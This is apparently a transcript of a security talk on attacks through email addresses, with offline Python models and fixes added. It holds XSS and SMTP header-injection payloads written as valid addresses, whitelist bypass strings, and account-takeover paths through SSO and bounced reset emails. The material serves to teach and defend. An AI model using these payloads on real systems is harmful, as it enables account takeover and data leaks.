You've Got Pwned
@securinti - @intigriti
Mandatory introduction slide for credibility
👨💻 Inti De Ceukelaire
✉ I like e-mails
💌 Confidential information
⚙ Complex logic
🗝 Outdated security
🌐 It’s everywhere
E-mail address
john.doe@example.com
The local part (john.doe)
The local part, quoted (“john.doe”)
Special case: wildcards & comments
The domain part (example.com)
● More strict than the local part
● Digits: bracketed IP address literals are allowed
○ john.doe@[127.0.0.1]
○ john.doe@[IPv6:2001:db8::1]
Let's construct some payloads!
These are all valid e-mail addresses
XSS:
● test+(<script>alert(0)</script>)@example.com
● test@example(<script>alert(0)</script>).com
● "<script>alert(0)</script>"@example.com
Header injection (Email):
● "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
● "recipient@test.com>\r\nRCPT TO:<victim+"@test.com
Defeating e-mail address domain whitelists
● inti(;inti@inti.io;)@whitelisted.com
→ inti(;
→ inti@inti.io → my inbox!
→ ;)@whitelisted.com
● inti@inti.io(@whitelisted.com)
● inti+(@whitelisted.com;)@inti.io
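The two slides above rest on a parser differential: the whitelist, the mail library and an RFC 5322 reader each see a different address in the same string. The block below is an added example (not the talk's code) that models the three views; the mail-library behaviour (split on `;`/`,`, then regex out an address) and the substring whitelist are assumptions chosen to reproduce the slide, not a specific product.

```python
"""Parser differential behind the comment-based whitelist bypasses.

  * whitelist_allows()  - a typical domain whitelist: substring check
  * naive_recipients()  - hypothetical mail library: split the recipient
                          string on ';' or ',' and regex-extract addresses
  * real_domain()       - RFC 5322 reading: (comments) stripped, quoted
                          strings and backslash escapes honoured
"""
import re

# The kind of loose address regex a mail library might use (assumption).
_LOOSE_ADDR = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def whitelist_allows(addr: str, allowed) -> bool:
    """Naive check: is '@<allowed domain>' anywhere in the string?"""
    lowered = addr.lower()
    return any(f"@{d.lower()}" in lowered for d in allowed)


def naive_recipients(header: str) -> list:
    """Split on list separators, keep the first address-looking token of
    each piece. Comments are not understood at all."""
    found = []
    for piece in re.split(r"[;,]", header):
        m = _LOOSE_ADDR.search(piece)
        if m:
            found.append(m.group(0))
    return found


def strip_comments(addr: str) -> str:
    """Remove RFC 5322 comments: parenthesised text outside quoted strings.
    Comments may nest; a backslash escapes the next character."""
    out, depth, in_quote, i = [], 0, False, 0
    while i < len(addr):
        c = addr[i]
        if c == "\\" and i + 1 < len(addr):
            if depth == 0:              # keep escapes that are not in a comment
                out.append(addr[i:i + 2])
            i += 2
            continue
        if in_quote:
            if c == '"':
                in_quote = False
            out.append(c)
        elif c == "(":
            depth += 1
        elif c == ")" and depth:
            depth -= 1
        elif depth:
            pass                        # inside a comment: drop
        else:
            if c == '"':
                in_quote = True
            out.append(c)
        i += 1
    if depth or in_quote:
        raise ValueError("unbalanced comment or quoted string")
    return "".join(out)


def real_domain(addr: str) -> str:
    """Domain after the first '@' outside a quoted string, once comments are
    gone: where an RFC-conformant MTA actually routes the message."""
    bare = strip_comments(addr)
    in_quote, i = False, 0
    while i < len(bare):
        c = bare[i]
        if c == "\\":
            i += 2
            continue
        if c == '"':
            in_quote = not in_quote
        elif c == "@" and not in_quote:
            return bare[i + 1:].lower()
        i += 1
    raise ValueError("no unquoted '@' in address")


if __name__ == "__main__":
    allowed = {"whitelisted.com"}
    for payload in (
        "inti(;inti@inti.io;)@whitelisted.com",
        "inti@inti.io(@whitelisted.com)",
        "inti+(@whitelisted.com;)@inti.io",
        '"recipient@test.com>\\r\\nRCPT TO:<victim+"@test.com',
    ):
        print(payload)
        print("  whitelist passes:  ", whitelist_allows(payload, allowed))
        print("  naive library sees:", naive_recipients(payload))
        print("  RFC routing domain:", real_domain(payload))
```

The check to adopt is `real_domain()` (or a library that canonicalises the same way) on the whitelist side, and rejecting any address that still contains a comment or a second `@` after canonicalisation, so the string the validator approves is the string the MTA will route.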
HTML injection in gmail
inti.de.ceukelaire+(<b>bold<u>underline<s>strike<br/>newline<strong>strong<sup>sup<sub>sub)@gmail.com
This led to wormable XSS in multiple popular e-mail clients
Bypassing strict e-mail validators
Bypassing strict e-mail validators through SSO chains & integrations
Differences in SSO providers
(the provider names were logos on the slide and are not recoverable here)
XSS payloads in email addresses?
1. NO
2. YES
3. NO
4. NO
5. YES
NO XSS here
But I found something better.
Differences in SSO providers
(the provider names were logos on the slide and are not recoverable here)
   XSS payloads in email addresses? | Unverified e-mails?
1. NO  | NO
2. YES | NO
3. NO  | NO
4. NO  | NO
5. YES | YES*
*verification status is sent within the IdP response, but not mandatory
Doesn’t work to hijack GitLab accounts 😔
My actual forum account:
securinti@wearehackerone.com (confirmed)
Attacker account (confirmation bypassed):
securinti@wearehackerone.com ("confirmed")
[Diagram, built up over four slides: FAKE ACCOUNT → GITLAB → REAL ACCOUNT → FORUM; final slide: ACCOUNT TAKEOVER!]
Shoutout to Ron Chan (@ngalog)
Let's start sending e-mails
[Diagram: arrives / bounces]
⚠ PSA ⚠
Don’t be a spammer
Seek permission
Reduce noise
State your intentions
Verifying the existence of e-mail addresses (NO SPAM)
● VRFY SMTP command (RFC 821 example)
VRFY Smith
R: 251 User not local; will forward to <Smith@USC-ISIQ.ARPA>
● Setting RCPT TO (and stopping before DATA, so nothing is sent)
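The exchange behind both bullets, as an added example that is not part of the talk: VRFY first, a fall-back to MAIL FROM / RCPT TO when VRFY is disabled (most MTAs answer 252), and a RSET instead of DATA so no message is ever queued. The MTA is a constructed stand-in so the code runs offline; its reply wording imitates common Postfix responses and is an assumption, as is the random "canary" address used to recognise catch-all domains, where RCPT acceptance proves nothing.

```python
"""Mailbox existence probe over SMTP without delivering a message."""
import secrets


class ScriptedSmtpServer:
    """Constructed MTA: a fixed set of mailboxes, VRFY disabled unless
    asked for, optionally a catch-all that accepts every RCPT."""

    def __init__(self, known, vrfy=False, catch_all=False):
        self.known = {k.lower() for k in known}
        self.vrfy = vrfy
        self.catch_all = catch_all
        self.data_started = False
        self.transcript = ["S: 220 mx.example.test ESMTP"]

    def _exists(self, addr):
        return self.catch_all or addr.lower() in self.known

    def send(self, line):
        """Client sends one command line; returns (code, reply text)."""
        self.transcript.append("C: " + line)
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "EHLO":
            reply = "250 mx.example.test Hello"
        elif verb in ("MAIL", "RSET"):
            reply = "250 2.0.0 Ok"
        elif verb == "VRFY":
            if not self.vrfy:
                reply = "252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery"
            elif self._exists(arg):
                reply = f"250 2.1.5 <{arg}>"
            else:
                reply = "550 5.1.1 User unknown"
        elif verb == "RCPT":
            addr = arg.split(":", 1)[1].strip("<> ")
            if self._exists(addr):
                reply = "250 2.1.5 Ok"
            else:
                reply = f"550 5.1.1 <{addr}>: Recipient address rejected: User unknown"
        elif verb == "DATA":
            self.data_started = True          # a probe must never get here
            reply = "354 End data with <CR><LF>.<CR><LF>"
        elif verb == "QUIT":
            reply = "221 2.0.0 Bye"
        else:
            reply = "502 5.5.2 Error: command not recognized"
        self.transcript.append("S: " + reply)
        return int(reply[:3]), reply[4:]


def classify(server, sender, addr):
    """'exists' / 'unknown' for one address: VRFY first, RCPT TO if VRFY is
    disabled. The envelope is reset afterwards, so no message is queued."""
    code, _ = server.send(f"VRFY {addr}")
    if code in (250, 251):
        return "exists"
    if code == 550:
        return "unknown"
    server.send("RSET")
    server.send(f"MAIL FROM:<{sender}>")
    code, _ = server.send(f"RCPT TO:<{addr}>")
    server.send("RSET")                       # never DATA
    return "exists" if code in (250, 251) else "unknown"


def probe(server, sender, addresses, domain):
    """Check many addresses; a random canary first detects a catch-all."""
    server.send("EHLO probe.example.test")
    canary = f"{secrets.token_hex(8)}@{domain}"
    if classify(server, sender, canary) == "exists":
        server.send("QUIT")
        return {a: "catch-all" for a in addresses}
    results = {a: classify(server, sender, a) for a in addresses}
    server.send("QUIT")
    return results


if __name__ == "__main__":
    mta = ScriptedSmtpServer(["alice@example.test"])
    print(probe(mta, "probe@attacker.test",
                ["alice@example.test", "bob@example.test"], "example.test"))
    print("\n".join(mta.transcript))
```

Against a real MX the same commands go over a `smtplib.SMTP` connection; keep the volume low and announce yourself in EHLO and MAIL FROM, in line with the PSA above.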
Tools and APIs
E-mail based recon
E-mail based recon - test@
E-mail based recon - free Slack invite
E-mail based recon - using printer as inbox
E-mail based recon - print@ 🖨
● On-site testing
● Public printers
● Social engineering
● Only works if the code is written out in text (no buttons like Slack)
E-mail based recon - autoresponders
Blind attacks through e-mail
1. Blind XSS in HTML e-mails
a. Include template injection payloads!
What I see vs. what the owner sees
[Diagram: mail to a Google forwarder; the owner's inbox is full, so I get a bounce with data while the owner sees nothing]
The bounce includes:
- the owner's e-mail address
- the document title
- the sharing link
SPF
Sender Policy Framework
DKIM
DomainKeys Identified Mail
DMARC
Domain-based Message Authentication, Reporting and Conformance
[Diagram: rotated label reads "Always bounce"]
Forwarders in real life
1. admin@shadywebsite.com (de-anonymise ransomware)
[Diagram: backupdata.company@malicious.com forwards to ???@gmail.com; the bounce reveals the Gmail address → Unmasked!]
*This is a reconstruction
Forwarders in real life
2. User e-mail aliases:
intidc@intigriti.me
intidc@wearehackerone.com
intidc@bugcrowdninja.com
Hacking our own @intigriti.me forwarder
Forwarders in real life
3. Branded multi-tenant environments: account takeover, no user interaction
[Diagram, built up over several slides: saas-app.com with two branded tenants, saasapp.alice.com (Alice) and saasapp.tools.john.io (John)]
● John's tenant sends its password reset mail from no-reply@john.io (to john@john.io)
● John adds Alice to his tenant through SSO
● The password reset mail for Alice is now sent from no-reply@john.io to alice@alice.com
● alice.com enforces STRICT DKIM → BOUNCE
● The bounce goes back to no-reply@john.io: John *has Alice's password reset*
● *Access to alice.com using Alice's account*
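The bounce path in the scenario above, as an added example that is not part of the talk: a toy relay whose strict receiving domains reject mail for an unauthorised From: domain and return the whole message to the envelope sender (Return-Path), which is what a real RFC 3464 DSN commonly does. The relay, the policy model, the hostnames and the reset URL are constructed stand-ins. The hardened run shows the one change the platform fully controls: keep the envelope sender on a platform-owned bounce address even when the From: header is branded for the tenant.

```python
"""Why a bounce hands the tenant owner the victim's reset link."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Message:
    envelope_from: str   # MAIL FROM / Return-Path: where a bounce is sent
    header_from: str     # From: header the recipient sees (branded sender)
    to: str
    subject: str
    body: str


class Relay:
    """Toy MTA. Receiving domains in `strict` reject a message whose From:
    domain the sending host is not authorised for (the talk's 'strict
    DKIM'); rejected mail comes back as a DSN to the envelope sender."""

    def __init__(self, strict_domains, authorised):
        self.strict = {d.lower() for d in strict_domains}
        self.authorised = authorised          # {sending host: {From: domains}}
        self.inboxes = defaultdict(list)

    def submit(self, msg, sending_host):
        rcpt_domain = msg.to.rsplit("@", 1)[1].lower()
        from_domain = msg.header_from.rsplit("@", 1)[1].lower()
        allowed = from_domain in self.authorised.get(sending_host, set())
        if rcpt_domain in self.strict and not allowed:
            self._bounce(msg, rcpt_domain)
            return False
        self.inboxes[msg.to.lower()].append(msg)
        return True

    def _bounce(self, msg, rcpt_domain):
        dsn = Message(
            envelope_from="",   # null reverse-path: a DSN is never bounced again
            header_from=f"MAILER-DAEMON@{rcpt_domain}",
            to=msg.envelope_from,
            subject="Undelivered Mail Returned to Sender",
            body=(f"<{msg.to}>: rejected by {rcpt_domain} policy\n"
                  "------ This is a copy of the message, including all the headers. ------\n"
                  f"From: {msg.header_from}\nTo: {msg.to}\nSubject: {msg.subject}\n\n"
                  f"{msg.body}"),
        )
        self.inboxes[msg.envelope_from.lower()].append(dsn)


def send_password_reset(relay, victim, branded_from, envelope_from, token):
    """The SaaS platform mails a reset link on behalf of a tenant."""
    link = f"https://saasapp.alice.com/reset?token={token}"      # assumed URL
    msg = Message(envelope_from, branded_from, victim,
                  "Password reset", f"Reset your password: {link}")
    return relay.submit(msg, sending_host="mail.saas-app.com")


def mailbox_contains(relay, mailbox, secret):
    return any(secret in m.body for m in relay.inboxes.get(mailbox.lower(), []))


def scenario(envelope_from, strict_victim=True):
    """One reset for alice@alice.com sent 'from' John's branded address;
    reports who ends up holding the token."""
    relay = Relay(strict_domains={"alice.com"} if strict_victim else set(),
                  authorised={"mail.saas-app.com": {"saas-app.com"}})
    token = "c0ffee-constructed-token"
    delivered = send_password_reset(relay, "alice@alice.com",
                                    "no-reply@john.io", envelope_from, token)
    return {
        "delivered": delivered,
        "alice_has_token": mailbox_contains(relay, "alice@alice.com", token),
        "john_has_token": mailbox_contains(relay, "no-reply@john.io", token),
        "platform_has_bounce": mailbox_contains(relay, "bounces@saas-app.com", token),
    }


if __name__ == "__main__":
    print("vulnerable:", scenario("no-reply@john.io"))        # bounce goes to John
    print("hardened:  ", scenario("bounces@saas-app.com"))    # bounce stays with the platform
    print("no policy: ", scenario("no-reply@john.io", strict_victim=False))
```

A platform-owned Return-Path removes the leak but the reset still bounces; the complete fix also refuses a branded From: domain until the tenant has delegated SPF/DKIM for it, and treats any bounce mailbox as holding secrets.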
Thank you!